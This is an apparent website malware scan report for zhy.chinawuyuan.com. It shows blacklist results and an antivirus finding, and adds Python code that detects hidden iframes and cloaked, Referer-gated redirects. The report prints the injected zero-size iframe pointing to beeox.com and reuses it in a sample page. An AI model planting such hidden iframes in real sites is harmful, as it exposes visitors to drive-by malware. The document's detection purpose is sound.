Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhy.chinawuyuan.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zhy.chinawuyuan.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status
http://zhy.chinawuyuan.com/ | 200 OK; Content-Length: 51088; Content-Type: text/html | malicious
    Malicious code - confirmed by antivirus engines (see the report below).
    Page script captured around the injection point (truncated as extracted):
    <!-- function objSP_Article() {this.ImgUrl=""; this.LinkUrl=""; this.Title="";} function SlidePic_Article(_id) {this.ID=_id; this.Width=0;this.Height=0; this.TimeOut=5000; this.Effect=23; this.TitleLen=0; this.PicNum=-1; this.Img=null; this.Url=null; this.Title=null; this.AllPic=new Array(); this.Add=SlidePic_Article_Add; this.Show=SlidePic_Article_Show; this.LoopShow=SlidePic_Article_LoopShow;} function SlidePic_Article_Add(_SP) {this.AllPic[this.AllPic.length] = _SP;} < this.Img.filters.revealTrans.Transition=this.Effect; this.Img.filters.revealTrans.apply(); this.Img.src=this.AllPic[this.PicNum].ImgUrl; this.Img.filters.revealTrans.play(); this.Url.href=this.AllPic[this.PicNum].LinkUrl; if(this.Title) this.Title.innerHTML="<a href="+this.AllPic[this.PicNum].LinkUrl+" target=_blank>"+this.AllPic[this.PicNum].Title+"</a>"; this.Img.timer=setTimeout(this.ID+".LoopShow()",this.TimeOut); }
    Antivirus report: hidden iframe found; size: 0x0; src: http://www.beeox.com/index1.html
    Injected element: <iframe src=http://www.beeox.com/index1.html width=0 height=0>
http://zhy.chinawuyuan.com/Article/JS/Article_newgz01.js | 200 OK; Content-Length: 1146; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_newgz03.js | 200 OK; Content-Length: 1202; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_newgz02.js | 200 OK; Content-Length: 1236; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_Newslymb.js | 200 OK; Content-Length: 1307; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Photo/JS/Photo_New0.js | 200 OK; Content-Length: 1459; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_New001.js | 200 OK; Content-Length: 931; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_New002.js | 200 OK; Content-Length: 1002; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_New003.js | 200 OK; Content-Length: 722; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_New004.js | 200 OK; Content-Length: 991; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_Newzjzy.js | 200 OK; Content-Length: 829; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_Newzyxm.js | 200 OK; Content-Length: 914; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_New10.js | 200 OK; Content-Length: 212; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_Newqhjt.js | 200 OK; Content-Length: 665; Content-Type: application/x-javascript | clean
http://zhy.chinawuyuan.com/Article/JS/Article_Newqw01.js | 200 OK; Content-Length: 973; Content-Type: application/x-javascript | clean
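The finding in the table above is the classic drive-by pattern: a zero-sized iframe, pointing at a third-party host, dropped into an otherwise ordinary page. The following is an added example (not the scanner's own code and not from the original report) that reproduces that check offline with Python's html.parser. It flags iframes that are 0 or 1 px in either dimension, CSS-hidden, or both, and notes when the src is off-site. The SAMPLE_HTML markup is constructed to mirror the finding (it is not the captured page), and the example.invalid URL and the function names are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample, modelled on the finding above; not the captured page.
SAMPLE_HTML = """<html><head><title>sample</title>
<script type="text/javascript">
function SlidePic_Article(_id) { this.ID=_id; this.TimeOut=5000; this.Effect=23; }
</script></head><body>
<div id="content">article list</div>
<iframe src=http://www.beeox.com/index1.html width=0 height=0>
<iframe src="/Photo/slideshow.html" width="300" height="150"></iframe>
<iframe src="http://example.invalid/drop.html" style="display: none"></iframe>
</body></html>"""


def _is_tiny(value):
    """True for a width/height of 0 or 1 (px or %), the usual drive-by sizes."""
    m = re.fullmatch(r"\s*(\d+)\s*(px|%)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collect (src, reasons) for every <iframe> a visitor would not see."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # Valueless attributes arrive as None; unquoted values (width=0) are parsed fine.
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        w, h = a.get("width", ""), a.get("height", "")
        if _is_tiny(w) or _is_tiny(h):
            reasons.append(f"size {w.strip() or '?'}x{h.strip() or '?'}")
        style = a.get("style", "").lower().replace(" ", "")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if not reasons:
            return
        src = a.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append("off-site")
        self.findings.append((src, ", ".join(reasons)))


def find_hidden_iframes(html, page_host):
    """Return [(src, reasons), ...] in document order for the given page HTML."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_HTML, "zhy.chinawuyuan.com"):
        print(f"hidden iframe: {src} ({why})")
```

Size alone is a weak signal (1x1 tracking frames exist), so the off-site marker is what turns a hit into something worth pulling the target URL for; the visible 300x150 slideshow frame is deliberately left unflagged.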
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 03 Oct 2014 23:33:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 51088
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQQBQBDB=OGFDOFGDPLNJFNPCCGHKFJCK; path=/
X-Powered-By: ASP.NET
...51088 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Referer: http://www.google.com/search?q=zhy.chinawuyuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
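The two queries in this section (a plain visit, then the same request carrying a search-engine Referer) are a check for conditional redirects: compromised sites often serve the malicious redirect only to visitors arriving from search results, so a single plain fetch misses it. The following added example (not the scanner's code) generalizes the method to several request profiles, fetches without following redirects so a 302 stays visible, and reports where each profile's response diverges from the plain visit. PROFILES, the Googlebot User-Agent string, and the fake_fetch stand-in for a cloaked site are assumptions and constructed data so the check can run offline; http_fetch is the live fetcher you would pass instead.

```python
import hashlib
import re
from urllib.error import HTTPError
from urllib.request import HTTPRedirectHandler, Request, build_opener

# Request profiles (assumed; extend as needed). The empty dict is the plain visit.
PROFILES = {
    "normal": {},
    "search-engine": {"Referer": "http://www.google.com/search?q=zhy.chinawuyuan.com"},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
}

# Client-side redirect markers worth flagging when they appear in one profile only.
JS_REDIRECT = re.compile(rb"(?i)location(\.href)?\s*=|location\.replace\s*\(|http-equiv\s*=\s*['\"]?refresh")


class _NoRedirect(HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = build_opener(_NoRedirect)


def http_fetch(url, extra_headers):
    """Live fetcher: returns (status, lowercased header dict, body bytes)."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0", **extra_headers})
    try:
        with _OPENER.open(req, timeout=15) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except HTTPError as err:  # includes the 3xx raised by _NoRedirect
        return err.code, {k.lower(): v for k, v in err.headers.items()}, err.read()


def compare_visits(url, fetcher=http_fetch, profiles=PROFILES):
    """Fetch url plainly, then once per profile; list how each response diverges."""
    base_status, _, base_body = fetcher(url, {})
    base_digest = hashlib.sha256(base_body).hexdigest()
    report = {}
    for name, headers in profiles.items():
        status, rhdrs, body = fetcher(url, headers)
        diffs = []
        if status != base_status:
            diffs.append(f"status {base_status} -> {status}")
        if 300 <= status < 400 and rhdrs.get("location"):
            diffs.append(f"redirect to {rhdrs['location']}")
        if hashlib.sha256(body).hexdigest() != base_digest:
            diffs.append(f"body differs ({len(base_body)} -> {len(body)} bytes)")
        if JS_REDIRECT.search(body) and not JS_REDIRECT.search(base_body):
            diffs.append("client-side redirect present only in this profile")
        report[name] = diffs
    return report


# Constructed stand-in for a cloaked site: direct visitors get the clean page,
# visitors arriving from a Google search get a 302 to a third-party host.
FAKE_PAGE = b"<html><body><p>normal article list</p></body></html>"


def fake_fetch(url, extra_headers):
    if "google.com/search" in extra_headers.get("Referer", ""):
        return 302, {"location": "http://bad.invalid/landing"}, b""
    return 200, {"content-type": "text/html"}, FAKE_PAGE


if __name__ == "__main__":
    for profile, diffs in compare_visits("http://zhy.chinawuyuan.com/", fake_fetch).items():
        print(profile, "->", diffs or "no difference")
```

Comparing body digests rather than only status codes matters because the injected content in the table above was served with a 200 and the same Content-Length as the clean page would be; the Referer-gated variant of that injection would show up here as "body differs" even with no redirect at all.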